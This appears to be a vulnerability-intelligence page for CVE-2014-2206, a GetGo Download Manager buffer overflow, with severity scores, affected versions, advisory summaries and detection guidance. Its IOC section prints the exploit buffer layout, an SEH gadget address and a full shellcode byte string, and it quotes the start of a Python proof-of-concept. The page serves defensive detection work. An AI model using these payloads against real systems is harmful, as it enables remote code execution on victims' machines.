CVE-2014-2206
published 2014-03-05CVE-2014-2206: Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service…
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
61.44%
99.1th percentile
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgosoft | getgo_download_manager | <= 4.4.5.502 | — |
| getgosoft | getgo_download_manager | — | — |
| getgosoft | getgo_download_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x90 * 4107 (junk) + \x90\x90\xEB\x06 (nseh) + \x00\x28\x0b\x0b (seh) + \x90 * 50 (nops)
bytes↗
\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea\xa5\x59\x50
- →The exploit triggers via a malicious HTTP response: the overflow is embedded in the HTTP status line (HTTP/1.1 200 <oversized payload>). Detect anomalously large HTTP response status lines (>4000 bytes) served to GetGo Download Manager clients. ↗
- →The SEH overwrite uses address 0x00280b0b (call dword ptr ss:[ebp+30]) sourced from outside loaded modules to bypass SafeSEH. Look for SEH chain overwrites pointing to this address in crash dumps or memory forensics. ↗
- →The overflow requires exactly 4107 bytes of padding before the nSEH/SEH overwrite. Network signatures should flag HTTP responses whose status-reason phrase exceeds ~4100 bytes. ↗
- →The attack vector is a victim downloading a file from an attacker-controlled server. Monitor GetGo Download Manager process network connections to untrusted HTTP servers, especially those returning oversized response headers. ↗
- →The nSEH short-jump sequence \x90\x90\xEB\x06 followed by the 4-byte SEH value \x0b\x0b\x28\x00 is a distinctive byte pattern detectable in HTTP response traffic via IDS/IPS signatures. ↗
- ·The PoC exploit was tested only on Windows XP SP3 (German locale). The hardcoded SEH gadget address (0x00280b0b) is environment-specific and may not be valid on other OS versions or patch levels. ↗
- ·The Metasploit module covers a broader version range (up to 5.3.0.2712) than the PoC (4.9.0.1982). Detection rules should account for all affected versions: 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier. ↗
- ·All loaded modules in the tested environment are SafeSEH-enabled; the exploit specifically sources its SEH gadget from outside loaded modules to bypass this protection. Environments with different module layouts will require a different gadget address. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Getgosoft GetGo Download Manager up to 4.4.5.502 memory corruption (EDB-32132 / ID 121824)
vuldb·2026-05-07·CVSS 10.0
CVE-2014-2206 [CRITICAL] Getgosoft GetGo Download Manager up to 4.4.5.502 memory corruption (EDB-32132 / ID 121824)
A vulnerability was found in Getgosoft GetGo Download Manager up to 4.4.5.502. It has been classified as critical. Impacted is an unknown function. The manipulation leads to memory corruption.
This vulnerability is listed as CVE-2014-2206. The attack may be initiated remotely. In addition, an exploit is available.
GHSA
GHSA-836x-hw9m-wqxh: Stack-based buffer overflow in GetGo Download Manager 4
ghsa_unreviewed·2022-05-14
CVE-2014-2206 [HIGH] CWE-119 GHSA-836x-hw9m-wqxh: Stack-based buffer overflow in GetGo Download Manager 4
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.
No detection rules found.
Exploit-DB
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
exploitdb·2014-03-09·CVSS 10.0
CVE-2014-2206 [CRITICAL] GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection
Metasploit
GetGo Download Manager HTTP Response Buffer Overflow
metasploit
GetGo Download Manager HTTP Response Buffer Overflow
GetGo Download Manager HTTP Response Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in GetGo Download Manager version 5.3.0.2712 earlier, caused by an overly long HTTP response header. By persuading the victim to download a file from a malicious server, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.
No writeups or analysis indexed.
http://www.rcesecurity.com/2014/03/cve-2014-2206-getgo-download-manager-http-response-header-buffer-overflow-remote-code-executionhttp://www.securityfocus.com/archive/1/531326/100/0/threadedhttp://www.securityfocus.com/bid/65913http://www.rcesecurity.com/2014/03/cve-2014-2206-getgo-download-manager-http-response-header-buffer-overflow-remote-code-executionhttp://www.securityfocus.com/archive/1/531326/100/0/threadedhttp://www.securityfocus.com/bid/65913
2014-03-05
Published